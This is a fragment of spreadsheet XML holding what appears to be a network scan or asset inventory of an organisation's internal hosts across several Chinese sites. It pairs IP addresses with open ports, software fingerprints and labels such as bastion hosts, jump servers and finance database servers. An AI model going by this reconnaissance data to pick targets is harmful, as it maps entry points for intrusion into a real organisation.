    <t>172.20.39.171</t>
  </si>
  <si>
    <t>172.20.39.54</t>
  </si>
  <si>
    <t>172.20.39.85</t>
  </si>
  <si>
    <t>172.20.39.70</t>
  </si>
  <si>
    <t>172.20.39.209</t>
  </si>
  <si>
    <t>172.20.39.200</t>
  </si>
  <si>
    <t>172.20.39.191</t>
  </si>
  <si>
    <t>172.20.39.76</t>
  </si>
  <si>
    <t>172.20.39.254</t>
  </si>
  <si>
    <t>172.20.39.96</t>
  </si>
  <si>
    <t>172.20.39.55</t>
  </si>
  <si>
    <t>172.20.39.207</t>
  </si>
  <si>
    <t>172.20.39.248</t>
  </si>
  <si>
    <t>172.20.39.234</t>
  </si>
  <si>
    <t>172.20.39.216</t>
  </si>
  <si>
    <t>172.20.39.139</t>
  </si>
  <si>
    <t>172.20.39.196</t>
  </si>
  <si>
    <t>172.20.39.29</t>
  </si>
  <si>
    <t>172.20.39.211</t>
  </si>
  <si>
    <t>172.20.39.175</t>
  </si>
  <si>
    <t>172.20.39.205</t>
  </si>
  <si>
    <t>172.20.39.91</t>
  </si>
  <si>
    <t>172.20.39.228</t>
  </si>
  <si>
    <t>172.20.39.195</t>
  </si>
  <si>
    <t>172.20.39.251</t>
  </si>
  <si>
    <t>172.20.39.4</t>
  </si>
  <si>
    <t>192.168.1.242</t>
  </si>
  <si>
    <t>172.20.39.182</t>
  </si>
  <si>
    <t>172.20.39.89</t>
  </si>
  <si>
    <t>172.20.39.143</t>
  </si>
  <si>
    <t>172.20.39.163</t>
  </si>
  <si>
    <t>172.20.39.49</t>
  </si>
  <si>
    <t>172.20.39.30</t>
  </si>
  <si>
    <t>172.20.39.79</t>
  </si>
  <si>
    <t>172.20.39.208</t>
  </si>
  <si>
    <t>172.20.39.174</t>
  </si>
  <si>
    <t>172.20.39.181</t>
  </si>
  <si>
    <t>172.20.39.159</t>
  </si>
  <si>
    <t>172.20.39.194</t>
  </si>
  <si>
    <t>172.20.39.197</t>
  </si>
  <si>
    <t>172.20.39.187</t>
  </si>
  <si>
    <t>172.20.39.252</t>
  </si>
  <si>
    <t>172.20.39.92</t>
  </si>
  <si>
    <t>172.20.39.161</t>
  </si>
  <si>
    <t>172.20.39.81</t>
  </si>
  <si>
    <t>172.20.39.231</t>
  </si>
  <si>
    <t>172.20.39.202</t>
  </si>
  <si>
    <t>172.20.39.158</t>
  </si>
  <si>
    <t>172.20.39.65</t>
  </si>
  <si>
    <t>172.20.39.226</t>
  </si>
  <si>
    <t>172.20.39.154</t>
  </si>
  <si>
    <t>192.168.1.209</t>
  </si>
  <si>
    <t>172.20.39.177</t>
  </si>
  <si>
    <t>172.20.39.204</t>
  </si>
  <si>
    <t>172.20.39.156</t>
  </si>
  <si>
    <t>172.20.39.20</t>
  </si>
  <si>
    <t>172.20.39.51</t>
  </si>
  <si>
    <t>172.20.39.144</t>
  </si>
  <si>
    <t>172.20.39.229</t>
  </si>
  <si>
    <t>172.20.39.192</t>
  </si>
  <si>
    <t>172.20.39.169</t>
  </si>
  <si>
    <t>172.20.39.166</t>
  </si>
  <si>
    <t>172.20.39.23</t>
  </si>
  <si>
    <t>172.20.39.17</t>
  </si>
  <si>
    <t>172.20.39.193</t>
  </si>
  <si>
    <t>172.20.39.220</t>
  </si>
  <si>
    <t>172.20.39.147</t>
  </si>
  <si>
    <t>172.20.39.138</t>
  </si>
  <si>
    <t>172.20.39.6</t>
  </si>
  <si>
    <t>172.20.39.45</t>
  </si>
  <si>
    <t>172.20.39.240</t>
  </si>
  <si>
    <t>192.168.1.193</t>
  </si>
  <si>
    <t>172.20.39.84</t>
  </si>
  <si>
    <t>172.20.39.36</t>
  </si>
  <si>
    <t>172.20.39.24</t>
  </si>
  <si>
    <t>172.20.39.74</t>
  </si>
  <si>
    <t>172.20.39.62</t>
  </si>
  <si>
    <t>172.20.39.39</t>
  </si>
  <si>
    <t>172.20.39.73</t>
  </si>
  <si>
    <t>172.20.39.176</t>
  </si>
  <si>
    <t>172.20.39.87</t>
  </si>
  <si>
    <t>172.20.39.7</t>
  </si>
  <si>
    <t>172.20.39.185</t>
  </si>
  <si>
    <t>172.20.39.44</t>
  </si>
  <si>
    <t>172.20.39.190</t>
  </si>
  <si>
    <t>172.20.39.14</t>
  </si>
  <si>
    <t>172.20.39.223</t>
  </si>
  <si>
    <t>172.20.39.82</t>
  </si>
  <si>
    <t>172.20.39.184</t>
  </si>
  <si>
    <t>172.20.39.224</t>
  </si>
  <si>
    <t>172.20.39.152</t>
  </si>
  <si>
    <t>172.20.39.34</t>
  </si>
  <si>
    <t>192.168.1.189</t>
  </si>
  <si>
    <t>172.20.39.77</t>
  </si>
  <si>
    <t>172.20.39.162</t>
  </si>
  <si>
    <t>172.20.39.32</t>
  </si>
  <si>
    <t>172.20.39.41</t>
  </si>
  <si>
    <t>172.20.39.225</t>
  </si>
  <si>
    <t>172.20.39.5</t>
  </si>
  <si>
    <t>172.20.39.68</t>
  </si>
  <si>
    <t>172.20.39.53</t>
  </si>
  <si>
    <t>172.20.39.244</t>
  </si>
  <si>
    <t>172.20.39.3</t>
  </si>
  <si>
    <t>172.20.39.48</t>
  </si>
  <si>
    <t>172.20.39.206</t>
  </si>
  <si>
    <t>172.20.39.57</t>
  </si>
  <si>
    <t>172.20.39.189</t>
  </si>
  <si>
    <t>172.20.39.86</t>
  </si>
  <si>
    <t>172.20.39.160</t>
  </si>
  <si>
    <t>172.20.39.90</t>
  </si>
  <si>
    <t>172.20.39.201</t>
  </si>
  <si>
    <t>172.20.39.137</t>
  </si>
  <si>
    <t>172.20.39.157</t>
  </si>
  <si>
    <t>172.20.39.15</t>
  </si>
  <si>
    <t>172.20.39.255</t>
  </si>
  <si>
    <t>172.20.39.72</t>
  </si>
  <si>
    <t>172.20.39.27</t>
  </si>
  <si>
    <t>172.20.39.164</t>
  </si>
  <si>
    <t>172.20.39.63</t>
  </si>
  <si>
    <t>172.20.39.21</t>
  </si>
  <si>
    <t>172.20.39.227</t>
  </si>
  <si>
    <t>172.20.39.178</t>
  </si>
  <si>
    <t>172.20.39.173</t>
  </si>
  <si>
    <t>172.20.39.170</t>
  </si>
  <si>
    <t>172.20.39.19</t>
  </si>
  <si>
    <t>172.20.39.95</t>
  </si>
  <si>
    <t>172.20.39.59</t>
  </si>
  <si>
    <t>172.20.39.148</t>
  </si>
  <si>
    <t>192.168.88.144</t>
  </si>
  <si>
    <t>onvif(3702)
tor-socks(9050)
soap(80)
http-alt(8000)
rtsp(554)
tcpwrapped(514,21)
tor-orport(9001)
upnp(5000)
login(513)
http(8080)
telnet(23)
cslistener(9000)</t>
  </si>
  <si>
    <t>192.168.88.143</t>
  </si>
  <si>
    <t>192.168.88.48</t>
  </si>
  <si>
    <t>192.168.88.66</t>
  </si>
  <si>
    <t>192.168.88.62</t>
  </si>
  <si>
    <t>192.168.1.102</t>
  </si>
  <si>
    <t>360526112</t>
  </si>
  <si>
    <t>ms-sql-s(1433)
ms-wbt-server(3389)
http(8080,10082,80,81,9080)
ftp(10083)
msrpc(2103,2105,135,2107)
ms-olap4(2383)
914c-g(211)
msmq(1801)
microsoft-ds(445)
ajp13(8009,9009)
tcpwrapped(21)</t>
  </si>
  <si>
    <t>Apache-Tomcat
Apache Jserv
Microsoft IIS httpd</t>
  </si>
  <si>
    <t>青岛旧MIS应用</t>
  </si>
  <si>
    <t>192.168.1.101</t>
  </si>
  <si>
    <t>ms-sql-s(1433)
ms-wbt-server(3389)
msmq(1801)
http(8080,10082,80,81,9080)
ftp(10083)
msrpc(2103,2105,135,2107)
ms-olap4(2383)
914c-g(211)
netbios-ssn(139)
microsoft-ds(445)
ajp13(8009,9009)
tcpwrapped(21)</t>
  </si>
  <si>
    <t>192.168.88.61</t>
  </si>
  <si>
    <t>192.168.1.17</t>
  </si>
  <si>
    <t>ssl(443,1883)
domain(53)
http(2062,80)</t>
  </si>
  <si>
    <t>192.168.2.254</t>
  </si>
  <si>
    <t>ssl(7443,443)
http(81,80)</t>
  </si>
  <si>
    <t>青岛云镜测试-可删除</t>
  </si>
  <si>
    <t>192.168.1.125</t>
  </si>
  <si>
    <t>tcpwrapped(443,3911)
ftp(21)
http(8080,80,631)
unknown(8291)
printer(515)
telnet(23)</t>
  </si>
  <si>
    <t>青岛安全态势感知探针设备</t>
  </si>
  <si>
    <t>192.168.1.70</t>
  </si>
  <si>
    <t>192.168.2.234</t>
  </si>
  <si>
    <t>192.168.2.19</t>
  </si>
  <si>
    <t>192.168.88.224</t>
  </si>
  <si>
    <t>onvif(3702)
sdr(9010)
unknown(880)
rtsp(554)
http(80)
hikvision-nvr(8000)
upnp(49152)
tambora(9020)</t>
  </si>
  <si>
    <t>hikvision-camera,Hikvision-IP CAMERA(Hikvision-NVR),UPnP/1.0,-Portable-SDK-for-UPnP-devices</t>
  </si>
  <si>
    <t>192.168.2.43</t>
  </si>
  <si>
    <t>msrpc(135)
ssl(1158)
http(5357)
ormi(5520)
914c-g(211)
netbios-ssn(139)
microsoft-ds(445)
ms-wbt-server(3389)</t>
  </si>
  <si>
    <t>192.168.1.114</t>
  </si>
  <si>
    <t>http(80)
ssh(22)
iscsi(3260)
ssl(443,4433)</t>
  </si>
  <si>
    <t>192.168.1.112</t>
  </si>
  <si>
    <t>192.168.1.122</t>
  </si>
  <si>
    <t>青岛上网行为管理</t>
  </si>
  <si>
    <t>192.168.1.111</t>
  </si>
  <si>
    <t>ssl(443)
http(100,80,85,9999,9998,89)</t>
  </si>
  <si>
    <t>192.168.1.7</t>
  </si>
  <si>
    <t>msrpc(10002,10003,10000,10001,135)
ms-sql-s(1433)
ms-olap4(2383)
http(80)
netbios-ssn(139)
vmware-auth(912,902)
microsoft-ds(445)
ssl(443)</t>
  </si>
  <si>
    <t>青岛堡垒机应用发布服务器</t>
  </si>
  <si>
    <t>192.168.1.118</t>
  </si>
  <si>
    <t>1033832018</t>
  </si>
  <si>
    <t>kpasswd5(464)
ms-wbt-server(3389)
msrpc(135,49155,49154,49153,49159,49152,49158,49175)
kerberos-sec(88)
domain(53)
tcpwrapped(636,3269)
ncacn_http(593,49157)
http(80)
netbios-ssn(139)
microsoft-ds(445)
ssl(443)
ldap(3268,389)</t>
  </si>
  <si>
    <t>青岛超融合物理服务器2地址</t>
  </si>
  <si>
    <t>192.168.1.113</t>
  </si>
  <si>
    <t>192.168.1.84</t>
  </si>
  <si>
    <t>msrpc(135)
ssl(5566)
ms-wbt-server(3389)
unknown(5040)
netbios-ssn(139)
tcpwrapped(2425)
microsoft-ds(445)
enpp(2968)</t>
  </si>
  <si>
    <t>192.168.1.119</t>
  </si>
  <si>
    <t>192.168.2.11</t>
  </si>
  <si>
    <t>http(888,8888,80,10082)
ssl(1158)
mysql(3306)
ormi(5520)
ftp(10083,21)
msrpc(2103,2105,135,2107)
914c-g(211)
netbios-ssn(139)
msmq(1801)
microsoft-ds(445)
ms-wbt-server(3389)</t>
  </si>
  <si>
    <t>Oracle
MySQL</t>
  </si>
  <si>
    <t>nginx
Oracle Containers for J2EE 10g
indy
EWS(nginx)</t>
  </si>
  <si>
    <t>EWS,indy,Oracle Containers for J2EE 10g</t>
  </si>
  <si>
    <t>192.168.2.44</t>
  </si>
  <si>
    <t>ftp(21)
netbios-ssn(139)
http(80,5666,8000,5005)
https(8001,443)
microsoft-ds(445)
upnp(49152)
tcpwrapped(3702)
rpcbind(2049,111)</t>
  </si>
  <si>
    <t>Restricted,UPnP/1.0,-Portable-SDK-for-UPnP-devices</t>
  </si>
  <si>
    <t>主应用服务器-2</t>
  </si>
  <si>
    <t>192.168.1.109</t>
  </si>
  <si>
    <t>2068838438</t>
  </si>
  <si>
    <t>http(2021,8085,808,80,8090,9999,6000,10082,9992)
ms-wbt-server(3389)
dec-notes(3333)
msmq(1801)
ftp(10083,81,21)
msrpc(2103,2105,135,2107)
914c-g(211)
netbios-ssn(139)
redis(6379)
microsoft-ds(445)
anet(212)</t>
  </si>
  <si>
    <t>nginx
indy
Microsoft IIS httpd</t>
  </si>
  <si>
    <t>Spring-Framework
Bootstrap(ASP.NET-MVC)(jQuery)</t>
  </si>
  <si>
    <t>192.168.2.12</t>
  </si>
  <si>
    <t>ms-wbt-server(3389)
mysql(3306)
ftp(10083)
msrpc(2103,2105,135,2107)
http(81,80,10082)
914c-g(211)
netbios-ssn(139)
msmq(1801)
microsoft-ds(445)
tcpwrapped(21)</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI 2.0
indy
Microsoft IIS httpd</t>
  </si>
  <si>
    <t>indy,Microsoft-HTTPAPI,Microsoft IIS httpd</t>
  </si>
  <si>
    <t>192.168.2.28</t>
  </si>
  <si>
    <t>192.168.1.214</t>
  </si>
  <si>
    <t>192.168.2.32</t>
  </si>
  <si>
    <t>http(80)
ssl(443)
domain(53)
rpcbind(111)
ssh(22)</t>
  </si>
  <si>
    <t>Lighttpd 1.4.39</t>
  </si>
  <si>
    <t>192.168.2.14</t>
  </si>
  <si>
    <t>192.168.2.33</t>
  </si>
  <si>
    <t>http(80)
westec-connect(5566)
ssh(22)</t>
  </si>
  <si>
    <t>192.168.2.40</t>
  </si>
  <si>
    <t>onvif(3702)
synobtrfsreplicad(5566)
iscsi(3263,3261)
ssh(10022)
netbios-ssn(445,139)
ssl(443)
https(5001)
http(5357,80,5000)</t>
  </si>
  <si>
    <t>nginx
VUE framework(nginx)</t>
  </si>
  <si>
    <t>青岛数据库集群vip地址等同于1.180</t>
  </si>
  <si>
    <t>192.168.1.108</t>
  </si>
  <si>
    <t>3326935519</t>
  </si>
  <si>
    <t>192.168.1.219</t>
  </si>
  <si>
    <t>microsoft-ds(445)
netbios-ssn(139)
msrpc(135)
unknown(5040)</t>
  </si>
  <si>
    <t>192.168.1.230</t>
  </si>
  <si>
    <t>备数据库-2-2</t>
  </si>
  <si>
    <t>192.168.1.181</t>
  </si>
  <si>
    <t>971451389</t>
  </si>
  <si>
    <t>192.168.1.156</t>
  </si>
  <si>
    <t>microsoft-ds(445)
netbios-ssn(139)
msrpc(49152,49167,49154,49165,49153,49160,135)</t>
  </si>
  <si>
    <t>192.168.1.176</t>
  </si>
  <si>
    <t>telnet(23)
daytime(13)
time(37)
ftp(21)</t>
  </si>
  <si>
    <t>青岛windows2016测试服务器</t>
  </si>
  <si>
    <t>192.168.1.124</t>
  </si>
  <si>
    <t>3490427414</t>
  </si>
  <si>
    <t>microsoft-ds(445)
netbios-ssn(139)
msrpc(135)
ms-wbt-server(3389)</t>
  </si>
  <si>
    <t>192.168.1.238</t>
  </si>
  <si>
    <t>microsoft-ds(445)
msrpc(135)</t>
  </si>
  <si>
    <t>主数据库-2</t>
  </si>
  <si>
    <t>192.168.1.180</t>
  </si>
  <si>
    <t>192.168.2.5</t>
  </si>
  <si>
    <t>stel(10005)
microsoft-ds(445)
msrpc(1028,135)
unknown(5040)</t>
  </si>
  <si>
    <t>深大报表查询数据库服务器</t>
  </si>
  <si>
    <t>192.168.1.3</t>
  </si>
  <si>
    <t>2486275770</t>
  </si>
  <si>
    <t>192.168.1.81</t>
  </si>
  <si>
    <t>tcpwrapped(631,80,515,8080,8290)
prnstatus(3911)</t>
  </si>
  <si>
    <t>192.168.1.2</t>
  </si>
  <si>
    <t>192.168.0.29</t>
  </si>
  <si>
    <t>192.168.0.41</t>
  </si>
  <si>
    <t>192.168.1.185</t>
  </si>
  <si>
    <t>192.168.88.1</t>
  </si>
  <si>
    <t>192.168.1.162</t>
  </si>
  <si>
    <t>192.168.0.0</t>
  </si>
  <si>
    <t>192.168.1.234</t>
  </si>
  <si>
    <t>192.168.88.23</t>
  </si>
  <si>
    <t>192.168.0.39</t>
  </si>
  <si>
    <t>192.168.1.76</t>
  </si>
  <si>
    <t>192.168.0.74</t>
  </si>
  <si>
    <t>192.168.1.138</t>
  </si>
  <si>
    <t>192.168.0.216</t>
  </si>
  <si>
    <t>192.168.1.223</t>
  </si>
  <si>
    <t>192.168.1.237</t>
  </si>
  <si>
    <t>192.168.1.14</t>
  </si>
  <si>
    <t>192.168.0.88</t>
  </si>
  <si>
    <t>192.168.0.40</t>
  </si>
  <si>
    <t>192.168.1.51</t>
  </si>
  <si>
    <t>192.168.1.142</t>
  </si>
  <si>
    <t>192.168.2.82</t>
  </si>
  <si>
    <t>192.168.2.69</t>
  </si>
  <si>
    <t>192.168.2.244</t>
  </si>
  <si>
    <t>192.168.2.222</t>
  </si>
  <si>
    <t>192.168.2.31</t>
  </si>
  <si>
    <t>192.168.2.15</t>
  </si>
  <si>
    <t>192.168.2.233</t>
  </si>
  <si>
    <t>192.168.2.251</t>
  </si>
  <si>
    <t>192.168.2.13</t>
  </si>
  <si>
    <t>192.168.2.159</t>
  </si>
  <si>
    <t>192.168.2.200</t>
  </si>
  <si>
    <t>192.168.2.185</t>
  </si>
  <si>
    <t>192.168.2.142</t>
  </si>
  <si>
    <t>192.168.2.8</t>
  </si>
  <si>
    <t>172.16.1.254</t>
  </si>
  <si>
    <t>http(80,81)
ssl(7443,443)</t>
  </si>
  <si>
    <t>172.16.1.11</t>
  </si>
  <si>
    <t>ssl(441,4433)</t>
  </si>
  <si>
    <t>172.16.1.20</t>
  </si>
  <si>
    <t>172.16.1.253</t>
  </si>
  <si>
    <t>172.16.1.100</t>
  </si>
  <si>
    <t>d-data-control(4302)
mysql(3306)
rpcbind(111)
ssh(22)
http(4388,8180)
ds-srvr(4401)
nfs_acl(2049)
redis(6379)</t>
  </si>
  <si>
    <t>深信服堡垒机</t>
  </si>
  <si>
    <t>172.16.1.4</t>
  </si>
  <si>
    <t>172.16.1.146</t>
  </si>
  <si>
    <t>172.16.1.173</t>
  </si>
  <si>
    <t>172.16.1.205</t>
  </si>
  <si>
    <t>smtp(25)
imap(143)</t>
  </si>
  <si>
    <t>172.16.1.199</t>
  </si>
  <si>
    <t>tcpwrapped(143,25)</t>
  </si>
  <si>
    <t>172.16.1.2</t>
  </si>
  <si>
    <t>172.16.1.1</t>
  </si>
  <si>
    <t>172.16.1.167</t>
  </si>
  <si>
    <t>172.16.1.147</t>
  </si>
  <si>
    <t>172.16.1.198</t>
  </si>
  <si>
    <t>172.16.1.174</t>
  </si>
  <si>
    <t>172.16.1.165</t>
  </si>
  <si>
    <t>172.16.1.190</t>
  </si>
  <si>
    <t>172.16.1.164</t>
  </si>
  <si>
    <t>172.16.1.191</t>
  </si>
  <si>
    <t>172.16.1.166</t>
  </si>
  <si>
    <t>上海TSS告警不推送</t>
  </si>
  <si>
    <t>192.16.6.200</t>
  </si>
  <si>
    <t>192.168.4.40</t>
  </si>
  <si>
    <t>192.168.4.127</t>
  </si>
  <si>
    <t>武汉测试win7虚拟机</t>
  </si>
  <si>
    <t>192.168.4.253</t>
  </si>
  <si>
    <t>武汉旧停车场服务器</t>
  </si>
  <si>
    <t>192.168.4.212</t>
  </si>
  <si>
    <t>ldap(389,3268)
msrpc(135)
kpasswd5(464)
ms-wbt-server(3389)
ncacn_http(593)
kerberos-sec(88)
domain(53)
http(80)
netbios-ssn(139)
tcpwrapped(3269,636)
microsoft-ds(445)
ssl(443)</t>
  </si>
  <si>
    <t>winpos服务器-2</t>
  </si>
  <si>
    <t>192.168.0.103</t>
  </si>
  <si>
    <t>windows 10.0.14393</t>
  </si>
  <si>
    <t>192.168.9.250</t>
  </si>
  <si>
    <t>192.168.1.71</t>
  </si>
  <si>
    <t>主应用服务器-1</t>
  </si>
  <si>
    <t>192.168.0.109</t>
  </si>
  <si>
    <t>192.168.1.174</t>
  </si>
  <si>
    <t>microsoft-ds(445)
netbios-ssn(139)
unknown(5040)
msrpc(135)</t>
  </si>
  <si>
    <t>192.168.1.227</t>
  </si>
  <si>
    <t>备数据库-2-1</t>
  </si>
  <si>
    <t>192.168.0.181</t>
  </si>
  <si>
    <t>备数据库-1-1</t>
  </si>
  <si>
    <t>192.168.0.188</t>
  </si>
  <si>
    <t>linux 6.5</t>
  </si>
  <si>
    <t>主数据库-1</t>
  </si>
  <si>
    <t>192.168.0.180</t>
  </si>
  <si>
    <t>青岛超融合集群地址</t>
  </si>
  <si>
    <t>192.168.1.115</t>
  </si>
  <si>
    <t>ssl(4433,443)
ssh(22)
iscsi(3260)
http(80)</t>
  </si>
  <si>
    <t>192.168.1.144</t>
  </si>
  <si>
    <t>msrpc(135)
ms-wbt-server(3389)
unknown(5040)
http(5357)
netbios-ssn(139)
bittorrent-tracker(6881)
microsoft-ds(445)</t>
  </si>
  <si>
    <t>192.168.1.151</t>
  </si>
  <si>
    <t>microsoft-ds(445)
netbios-ssn(139)
unknown(5040)
msrpc(135)
vmware-auth(912,902)</t>
  </si>
  <si>
    <t>192.168.1.67</t>
  </si>
  <si>
    <t>msrpc(135)
unknown(5040)
http(5357)
netbios-ssn(139)
bittorrent-tracker(6881)
microsoft-ds(445)</t>
  </si>
  <si>
    <t>192.168.22.240</t>
  </si>
  <si>
    <t>192.168.22.235</t>
  </si>
  <si>
    <t>泛微oa系统-测试服务器</t>
  </si>
  <si>
    <t>172.16.5.35</t>
  </si>
  <si>
    <t>4129559252</t>
  </si>
  <si>
    <t>msrpc(49153,49223,50109,135,49155,49152,49210,49154)
ssl(5223,9443)
ms-sql-s(1433)
ms-wbt-server(3389)
ms-olap4(2383)
java-rmi(54511,1099)
jabber(5222)
netbios-ssn(139)
microsoft-ds(445)
tcpwrapped(10050)
http(88,7070,80,47001,5985,9090)</t>
  </si>
  <si>
    <t>跳板机1</t>
  </si>
  <si>
    <t>172.16.5.12</t>
  </si>
  <si>
    <t>1650928401</t>
  </si>
  <si>
    <t>http(5985,47001)
tcpwrapped(10050)
msrpc(49671,49672,49664,49665,49723,49666,135,49668)
x11(6000)
ms-wbt-server(3389)</t>
  </si>
  <si>
    <t>财务系统正式-数据库服务器</t>
  </si>
  <si>
    <t>172.16.6.20</t>
  </si>
  <si>
    <t>1305013754</t>
  </si>
  <si>
    <t>oracle-tns(49706,1521)
ftp(21)
ms-wbt-server(3389)
ormi(5520)
http(47001,80,5985)
netbios-ssn(139)
unknown(49152)
msrpc(49664,49666,135,49671,49665,49676,49737,49668)
microsoft-ds(445)
tcpwrapped(10050)
raxa-mgmt(6099)
ssl(1158,3938)</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI 2.0
Oracle Containers for J2EE 10g
Microsoft IIS httpd</t>
  </si>
  <si>
    <t>财务系统正式-应用服务器</t>
  </si>
  <si>
    <t>172.16.5.20</t>
  </si>
  <si>
    <t>2608145731</t>
  </si>
  <si>
    <t>http(8090,47001,8000,80,5985)
ftp(21)
msrpc(49664,49667,49666,135,49671,49670,49665,49738)
netbios-ssn(139)
microsoft-ds(445)
tcpwrapped(10050)
raxa-mgmt(6099)
ms-wbt-server(3389)</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI 2.0
Apache-Tomcat
Microsoft IIS httpd</t>
  </si>
  <si>
    <t>数据平台-酒店-联营商餐数据填报服务器</t>
  </si>
  <si>
    <t>172.16.5.90</t>
  </si>
  <si>
    <t>1144009229</t>
  </si>
  <si>
    <t>msrpc(49664,49667,49666,135,49759,49670,49665,49676)
mysql(3306)
http(81,47001,8080,80,5985)
mysqlx(33060)
netbios-ssn(139)
tcpwrapped(21)
microsoft-ds(445)
raxa-mgmt(6099)
ms-wbt-server(3389)</t>
  </si>
  <si>
    <t>数据平台-计算存储节点3-emr</t>
  </si>
  <si>
    <t>172.16.6.43</t>
  </si>
  <si>
    <t>1492060662</t>
  </si>
  <si>
    <t>java-rmi(9604,33282,44741,9602,40537,9601)
hadoop-ipc(50020,8485,44297,8040)
ssh(22)
thrift-binary(10000)
unknown(34016,38642,50010)
mapreduce(13562)
tcpwrapped(36071,33064,38281,34914,32818,10050,34056,34379,33439,41234,38816,40692,44043,33515,34497)
http(4040,9501,18480,9502,18042,60075,6060,9504,9508)
rpcbind(111)</t>
  </si>
  <si>
    <t>Jetty 9.4.z-SNAPSHOT
Jetty</t>
  </si>
  <si>
    <t>jQuery-ui
Bootstrap(jQuery)
jQuery(Bootstrap)</t>
  </si>
  <si>
    <t>数据平台-计算存储节点2-emr</t>
  </si>
  <si>
    <t>172.16.6.42</t>
  </si>
  <si>
    <t>2216262602</t>
  </si>
  <si>
    <t>java-rmi(9604,32989,34936,9602,45654,9601)
tcpwrapped(41476,40691,40980,10050,45588,34477,40693,46559,36200,43483,44109,40294,39345)
unknown(44088,46115,50010)
ssh(22)
rpcbind(111)
mapreduce(13562)
hadoop-ipc(50020,42652,8485,8040)
http(4040,9501,18480,9502,18042,60075,6060,9504,9508)
thrift-binary(10000)</t>
  </si>
  <si>
    <t>数据平台-管理节点2-大数据管控</t>
  </si>
  <si>
    <t>172.16.5.85</t>
  </si>
  <si>
    <t>1822130086</t>
  </si>
  <si>
    <t>hadoop-ipc(9000,8019,8033)
java-rmi(9606,9609,40793,37688,44196,33147,9603,9618)
ssh(22)
rpcbind(111)
emc-pp-mgmtsvc(9083)
http(9506,9509,60070,9503,9518,18088,6060)
tcpwrapped(10050)</t>
  </si>
  <si>
    <t>数据平台-平台节点2-离线平台</t>
  </si>
  <si>
    <t>172.16.5.83</t>
  </si>
  <si>
    <t>1068258309</t>
  </si>
  <si>
    <t>http(81,82,8875,80)
ssh(22)</t>
  </si>
  <si>
    <t>Tengine</t>
  </si>
  <si>
    <t>Spring-Framework
Font-Awesome</t>
  </si>
  <si>
    <t>Alibaba Group</t>
  </si>
  <si>
    <t>数据平台-平台节点1-离线平台</t>
  </si>
  <si>
    <t>172.16.5.86</t>
  </si>
  <si>
    <t>3952167627</t>
  </si>
  <si>
    <t>http(81,82,8875,80,9091)
ssh(22)</t>
  </si>
  <si>
    <t>Spring-Framework
Font-Awesome
jQuery(Bootstrap)</t>
  </si>
  <si>
    <t>数据平台-数仓-备库</t>
  </si>
  <si>
    <t>172.16.6.51</t>
  </si>
  <si>
    <t>1821280376</t>
  </si>
  <si>
    <t>ssh(22)
tcpwrapped(10050)
rpcbind(111)</t>
  </si>
  <si>
    <t>动物管理系统</t>
  </si>
  <si>
    <t>172.16.5.73</t>
  </si>
  <si>
    <t>4041015167</t>
  </si>
  <si>
    <t>qotd(17)
daytime(13)
http(8099,47001,5985)
ms-wbt-server(3389)
ssl(4436)
chargen(19)
discard(9)
unknown(10073)
msmq(1801)
ms-sql-s(1433)
tcpwrapped(10050)
msrpc(49158,49153,2103,2107,49155,49161,2105,49152,49156,49154,49157)
echo(7)
raxa-mgmt(6099)</t>
  </si>
  <si>
    <t>jQuery(ASP.NET-MVC)(Font-Awesome)(layui)</t>
  </si>
  <si>
    <t>数据中台中间库-跳板机1</t>
  </si>
  <si>
    <t>172.16.5.72</t>
  </si>
  <si>
    <t>1550661474</t>
  </si>
  <si>
    <t>http(5985,47001)
tcpwrapped(10050)
msrpc(49713,49664,49667,49665,49675,49669,49673,135,49668)
ms-wbt-server(3389)</t>
  </si>
  <si>
    <t>团队预约平台-数据库服务器1</t>
  </si>
  <si>
    <t>172.16.6.25</t>
  </si>
  <si>
    <t>147427494</t>
  </si>
  <si>
    <t>数据中台中间库-备库</t>
  </si>
  <si>
    <t>172.16.6.31</t>
  </si>
  <si>
    <t>1315179925</t>
  </si>
  <si>
    <t>rpcbind(111)
ssh(22)
oracle-tns(1521)
oracle(30697)
tcpwrapped(10050)
raxa-mgmt(6099)</t>
  </si>
  <si>
    <t>团队预约平台-应用服务器2</t>
  </si>
  <si>
    <t>172.16.5.62</t>
  </si>
  <si>
    <t>1467268020</t>
  </si>
  <si>
    <t>ssh(22)
rpcbind(111)
http(443,80,8081)
ssl(33615)
rsync(873)
tcpwrapped(10050)
raxa-mgmt(6099)</t>
  </si>
  <si>
    <t>团队预约平台-应用服务器1</t>
  </si>
  <si>
    <t>172.16.5.61</t>
  </si>
  <si>
    <t>2823758307</t>
  </si>
  <si>
    <t>ssh(22)
rpcbind(111)
http(80,8081)
ssl(42581,443)
tcpwrapped(10050)
raxa-mgmt(6099)</t>
  </si>
  <si>
    <t>122.144.156.33</t>
  </si>
  <si>
    <t>数据中台中间库-虚拟ip</t>
  </si>
  <si>
    <t>172.16.6.32</t>
  </si>
  <si>
    <t>2097195576</t>
  </si>
  <si>
    <t>oracle(34172)
ssh(22)
rpcbind(111)
oracle-tns(1521)
tcpwrapped(10050)
raxa-mgmt(6099)</t>
  </si>
  <si>
    <t>oa系统-水印服务器</t>
  </si>
  <si>
    <t>172.16.5.71</t>
  </si>
  <si>
    <t>3639478849</t>
  </si>
  <si>
    <t>ssh(22)
rpcbind(111)
unknown(10628)
tcpwrapped(10050)
http(8080)
raxa-mgmt(6099)</t>
  </si>
  <si>
    <t>泛微oa系统-测试数据库服务器</t>
  </si>
  <si>
    <t>172.16.6.75</t>
  </si>
  <si>
    <t>2727909600</t>
  </si>
  <si>
    <t>ms-sql-s(1433)
http(5985,47001,80)
ms-olap4(2383)
netbios-ssn(139)
msrpc(49153,49155,49156,49241,49154,49243,49152,135)
microsoft-ds(445)
tcpwrapped(10050)
ms-wbt-server(3389)</t>
  </si>
  <si>
    <t>泛微oa系统-测试应用服务器</t>
  </si>
  <si>
    <t>172.16.5.75</t>
  </si>
  <si>
    <t>785987229</t>
  </si>
  <si>
    <t>ms-wbt-server(3389)
mysqlx(48060)
http(8080,9081,5985,47001,1117)
mysql(4806)
netbios-ssn(139)
ssl(8444)
tcpwrapped(49228,49207,10050)
microsoft-ds(445)
msrpc(49153,49155,49156,49154,50039,49152,49995,135)</t>
  </si>
  <si>
    <t>DWS(Resin resin-3.1.15)(Resin/resin-3.1.15)
WFC
Microsoft-HTTPAPI 2.0</t>
  </si>
  <si>
    <t>jQuery(Polyfill)
Bootstrap
Bootstrap(jQuery)
Polyfill(jQuery)</t>
  </si>
  <si>
    <t>数据中台中间库-跳板机</t>
  </si>
  <si>
